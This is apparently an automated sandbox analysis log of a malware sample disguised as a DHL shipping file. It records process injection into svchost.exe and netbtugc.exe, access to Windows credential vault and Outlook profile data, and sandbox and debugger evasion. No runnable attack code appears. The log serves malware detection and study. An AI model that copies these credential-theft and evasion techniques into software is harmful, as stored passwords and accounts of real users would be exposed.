            Source: netbtugc.exe, 00000003.00000002.4179067242.0000000002F50000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.2061633590.0000000002F50000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.2061451560.0000000002F2F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: DHL 073412182024.exeVirustotal: Detection: 56%
            Source: DHL 073412182024.exeReversingLabs: Detection: 57%
            Source: unknownProcess created: C:\Users\user\Desktop\DHL 073412182024.exe "C:\Users\user\Desktop\DHL 073412182024.exe"
            Source: C:\Users\user\Desktop\DHL 073412182024.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL 073412182024.exe"
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\DHL 073412182024.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL 073412182024.exe"Jump to behavior
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\DHL 073412182024.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 073412182024.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 073412182024.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 073412182024.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 073412182024.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 073412182024.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 073412182024.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 073412182024.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 073412182024.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 073412182024.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 073412182024.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 073412182024.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\netbtugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: DHL 073412182024.exeStatic file information: File size 1249792 > 1048576
            Source: DHL 073412182024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: DHL 073412182024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: DHL 073412182024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: DHL 073412182024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: DHL 073412182024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: DHL 073412182024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: DHL 073412182024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ihoQcJjaPvtmjn.exe, 00000002.00000000.1806584101.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: DHL 073412182024.exe, 00000000.00000003.1748469531.0000000003860000.00000004.00001000.00020000.00000000.sdmp, DHL 073412182024.exe, 00000000.00000003.1748744379.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1794304995.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1883601522.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1790153905.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1883601522.000000000359E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.1885821131.00000000032C4000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4180175130.0000000003470000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.1883428748.0000000003119000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4180175130.000000000360E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: DHL 073412182024.exe, 00000000.00000003.1748469531.0000000003860000.00000004.00001000.00020000.00000000.sdmp, DHL 073412182024.exe, 00000000.00000003.1748744379.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1794304995.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1883601522.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1790153905.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1883601522.000000000359E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000003.00000003.1885821131.00000000032C4000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4180175130.0000000003470000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.1883428748.0000000003119000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4180175130.000000000360E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: netbtugc.pdb source: svchost.exe, 00000001.00000002.1883306387.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1852198880.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, ihoQcJjaPvtmjn.exe, 00000002.00000003.1953492858.0000000000D7C000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: ihoQcJjaPvtmjn.exe, 00000002.00000002.4189634765.000000000691C000.00000004.80000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4180786446.0000000003A9C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4179067242.0000000002ECE000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2168944344.0000000036A3C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: ihoQcJjaPvtmjn.exe, 00000002.00000002.4189634765.000000000691C000.00000004.80000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4180786446.0000000003A9C000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4179067242.0000000002ECE000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2168944344.0000000036A3C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000001.00000002.1883306387.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1852198880.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, ihoQcJjaPvtmjn.exe, 00000002.00000003.1953492858.0000000000D7C000.00000004.00000001.00020000.00000000.sdmp
            Source: DHL 073412182024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: DHL 073412182024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: DHL 073412182024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: DHL 073412182024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: DHL 073412182024.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00DA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00DA42DE
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00DC0A76 push ecx; ret 0_2_00DC0A89
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004048A9 push esp; ret 1_2_004048AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041E2BA push 00000038h; iretd 1_2_0041E2BE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A436 push ebx; iretd 1_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418C92 pushad ; retf 1_2_00418C93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041A5D9 push ebx; iretd 1_2_0041A600
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004017E5 push ebp; retf 003Fh1_2_004017E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403780 push eax; ret 1_2_00403782
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004147A2 push es; iretd 1_2_004147AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0340225F pushad ; ret 1_2_034027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034027FA pushad ; ret 1_2_034027F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034309AD push ecx; mov dword ptr [esp], ecx1_2_034309B6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0340283D push eax; iretd 1_2_03402858
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0340135E push eax; iretd 1_2_03401369
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeCode function: 2_2_08DE40FD push cs; ret 2_2_08DE411C
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeCode function: 2_2_08DE40EF push 76A8CD85h; retf 2_2_08DE40FA
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeCode function: 2_2_08DC69CE push eax; retf 2_2_08DC6A1A
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeCode function: 2_2_08DE19B5 push FFFFFFBAh; ret 2_2_08DE19B7
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeCode function: 2_2_08DD8916 push ebx; iretd 2_2_08DD893D
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeCode function: 2_2_08DD1A60 push esi; iretd 2_2_08DD1A65
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeCode function: 2_2_08DC6A1B push eax; retf 2_2_08DC6A1A
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeCode function: 2_2_08DC2BE6 push esp; ret 2_2_08DC2BE7
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeCode function: 2_2_08DDC5F7 push 00000038h; iretd 2_2_08DDC5FB
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeCode function: 2_2_08DD6FCF pushad ; retf 2_2_08DD6FD0
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeCode function: 2_2_08DE27C0 pushfd ; retf 2_2_08DE27CB
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exeCode function: 2_2_08DD8773 push ebx; iretd 2_2_08DD893D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0347225F pushad ; ret 3_2_034727F9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034727FA pushad ; ret 3_2_034727F9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_034A09AD push ecx; mov dword ptr [esp], ecx3_2_034A09B6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0347283D push eax; iretd 3_2_03472858
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0347135E push eax; iretd 3_2_03471369
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00DBF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00DBF98E
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E31C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00E31C41
            Source: C:\Users\user\Desktop\DHL 073412182024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\DHL 073412182024.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\DHL 073412182024.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-98109
            Source: C:\Users\user\Desktop\DHL 073412182024.exeAPI/Special instruction interceptor: Address: FEFE6C
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE22210154
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347096E rdtsc 1_2_0347096E
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 3339Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeWindow / User API: threadDelayed 6633Jump to behavior
            Source: C:\Users\user\Desktop\DHL 073412182024.exeAPI coverage: 3.9 %
            Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\netbtugc.exeAPI coverage: 2.8 %
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exe TID: 3684Thread sleep time: -80000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\XkkWoLDKlVJdEJWSWaafEAxVEbgdUBEqWzkTKqyeobTYFaPlbREsDqtHAvRNg\ihoQcJjaPvtmjn.exe TID: 3684Thread sleep time: -34000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6204Thread sleep count: 3339 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6204Thread sleep time: -6678000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6204Thread sleep count: 6633 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6204Thread sleep time: -13266000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\netbtugc.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E0DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00E0DBBE
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E168EE FindFirstFileW,FindClose,0_2_00E168EE
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E1698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00E1698F
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E0D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00E0D076
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E0D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00E0D3A9
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E19642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00E19642
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E1979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00E1979D
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E19B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00E19B2B
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E15C97 FindFirstFileW,FindNextFileW,FindClose,0_2_00E15C97
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02B4BAB0 FindFirstFileW,FindNextFileW,FindClose,3_2_02B4BAB0
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00DA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00DA42DE
            Source: netbtugc.exe, 00000003.00000002.4179067242.0000000002ECE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv
            Source: ihoQcJjaPvtmjn.exe, 00000002.00000002.4179435112.0000000000D80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
            Source: firefox.exe, 00000007.00000002.2170650596.00000275B69FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347096E rdtsc 1_2_0347096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417823 LdrLoadDll,1_2_00417823
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00E1EAA2 BlockInput,0_2_00E1EAA2
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00DD2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00DD2622
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00DA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00DA42DE
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00DC4CE8 mov eax, dword ptr fs:[00000030h]0_2_00DC4CE8
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00FF00D8 mov eax, dword ptr fs:[00000030h]0_2_00FF00D8
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00FF0138 mov eax, dword ptr fs:[00000030h]0_2_00FF0138
            Source: C:\Users\user\Desktop\DHL 073412182024.exeCode function: 0_2_00FEEA68 mov eax, dword ptr fs:[00000030h]0_2_00FEEA68
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B2349 mov eax, dword ptr fs:[00000030h]1_2_034B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B035C mov eax, dword ptr fs:[00000030h]1_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B035C mov eax, dword ptr fs:[00000030h]1_2_034B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B035C mov eax, dword ptr fs:[00000030h]1_2_034B035C
